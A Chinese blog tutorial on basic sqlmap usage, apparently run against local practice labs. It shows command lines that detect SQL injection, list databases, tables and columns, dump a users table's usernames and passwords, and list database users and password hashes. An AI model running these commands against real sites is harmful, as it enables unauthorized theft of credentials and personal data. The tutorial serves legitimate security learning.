sqlmap基本使用

最新推荐文章于 2023-06-23 10:47:59 发布
最新推荐文章于 2023-06-23 10:47:59 发布
阅读量229 收藏 1
点赞数
文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/i_am_gaga/article/details/107295878
版权

0x01 SQLMap简介

​ SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多插件。SQLMap采用了以下5种独特的SQL注入技术。

  • 基于布尔类型的盲注

  • 基于时间的盲注

  • 基于报错注入

  • 联合查询注入

  • 堆查询注入

    kali平台自带SQLMap,启动SQLMap如下图所示:

image-20200707092205695

0x02 SQLMap基础

1.判断是否存在注入

目标注入点为http://192.168.1.152:10000/control/sqlinject/manifest_error.php?id=1,判断其是否存在注入的命令如下:

root@kali-Y:~# sqlmap -u  http://192.168.1.152:10000/control/sqlinject/manifest_error.php?id=1

结果显示存在注入,如下图所示。

2.查询当前用户下的所有数据库

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --dbs

image-20200707095643339

3.获取数据库中的表名

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security --tables

-D 参数来指定具体的数据库,若未加-D参数,则会列出数据库中所有库的表。

image-20200707100330133

4.获取表中的字段名

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security -T users --columns

# -D 指定数据库
# -T 指定表名

image-20200707100736174

5.获取字段内容

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security -T users -C id,password,username --dump

# -D 指定数据库
# -T 指定表名
# -C 指定字段

image-20200707101227167

6.获取数据库的所有用户

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --users

# 在当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有的管理用户

image-20200707101723208

7.获取数据库用户的密码

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --passwords

image-20200707115756580

这里没有发现…

8.获取当前网站数据库的名称

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --current-db

image-20200707111027502

9.获取当前网站数据库的用户名称

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --current-user

image-20200707111056516

参考:Web安全攻防-渗透测试实战指南

chuanlet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9129
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLmap
qq_41638872的博客
06-23 1613
SQLmap使用
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 5361
本文会主要介绍SQLMap使用,包括常用的参数,常用的语句,以及常用的功能。
SQLMAP使用笔记.pdf
01-25
一、SQLMAP基本使用 SQLMAP基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
sqlmap使用手册
12-11
1. **安装与配置**: 首先,要在本地环境中安装SQLMap,了解基本的命令行选项和配置参数。 2. **理解注入类型**: 学习不同类型的SQL注入,如基于错误的注入、基于时间的注入、联合查询注入等。 3. **实战演练**: ...
SQLMAP的注入使用
05-13
SQLMAP的注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
sqlmap使用文档
11-11
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
sqlmap安装包
01-19
5. **添加到PATH**:为了方便在任何目录下使用sqlmap,你可以将其可执行脚本添加到系统PATH中。在终端中输入: ``` sudo ln -s /path/to/sqlmap.py /usr/local/bin/sqlmap ``` 将`/path/to/`替换为实际的sqlmap....
细说——sqlmap
LainWith的博客
11-20 4672
目录一些地址关于SQLmap5种漏洞检测技术更多sqlmap参数常用命令指定某个url进行测试GET型POST型需要登录cookie型指定测试的参数检测cookie注入参数拆分字符从文件中加载HTTP请求测试GET型POST型从文本中获取多个目标扫描从谷歌引擎搜索结果扫描测试时常用的参数指定参数指定数据库指定数据库服务器系统指定无效的大数字指定无效的逻辑注入payload列出数据时常用的参数数据库版本用户获取所有库当前数据库当前用户是否为管理员列数据库用户列出并破解数据库用户的hash列出数据库管理员权限列
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4678
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap详细教程
简介
01-04 3149
SQLmqp教程!
sqlmap工具使用
qq_39416206的博客
03-08 3346
一、打开方式 1.首先找到sqlmap的文件夹点进去之后,在图标位置输入cmd三个见键盘字母 2.然后就进入这样的页面 3.我们可以在这里输入 python sqlmap.py 查看一下是否正常
Sqlmap使用教程
B-Tree
02-24 3718
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
sqlmap命令详解
Pitbull2014的博客
12-20 1109
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap基本使用方法
最新发布
08-24
- *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值